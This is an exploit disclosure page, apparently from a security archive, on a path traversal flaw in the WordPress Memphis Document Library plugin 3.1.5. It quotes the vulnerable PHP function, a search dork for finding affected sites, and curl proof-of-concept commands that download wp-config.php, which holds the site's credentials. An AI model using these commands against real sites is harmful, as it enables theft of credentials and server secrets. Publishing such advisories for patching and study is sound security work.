WordPress Memphis Document Library Plugin 3.1.5 Path Disclosure

2016-04-04 / 2016-04-05
Credit: Hacker Khan
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Arbitrary file download in Memphis Document Library 3.1.5 # Google Dork: inurl:"mdocs-posts" -site:wordpress.org # Vendor Homepage: https://wordpress.org # Software Link: https://downloads.wordpress.org/plugin/memphis-documents-library.3.1.5.zip # Version: 3.1.5 (Vulnerable from 2.3 to 3.1.5, fixed in 3.1.6) # Tested on: Ubuntu 12.04, Wordpress 4.4.2. # CVE : N/A # Vulnerable file: memphis-documents-library/mdocs-downloads.php # Vulnerable function: mdocs_img_preview() # Vulnerable GET parameter: Injectable 'mdocs-img-preview' # Vulnerable line: 90 to 93 # Vulnerable code: 87 function mdocs_img_preview() { 88 require_once(ABSPATH . 'wp-includes/pluggable.php'); 89 $upload_dir = wp_upload_dir(); 90 $image = $upload_dir['basedir'].MDOCS_DIR.$_GET['mdocs-img-preview']; 91 $content = file_get_contents($image); 92 header('Content-Type: image/jpeg'); 93 echo $content; exit(); 94 } # POC: curl http://example.site.com/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php or if the plugin is not installed in the root folder of wordpress, for example in the folder "mdocs-posts": curl http://example.site.com/mdocs-posts/?mdocs-img-preview=../../../wp-config.php -o example-wp-config.php ################################# [+] We Are Iranian Anonymous Iranonymous.org [+] Discovered By: Hacker Khan ################= [+] Thanks to : MR.Khatar |||| ll_azab-siyah_ll || iran || Sh@d0w || MaMaD_Malware|| OnE_H4Ck3R || Shdmehr || B.D [+] Happy Boy || Blackwolf_Iran || MR.zarvan || Security Soldier || InfernaL And All Of Iranian Anonymous .


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top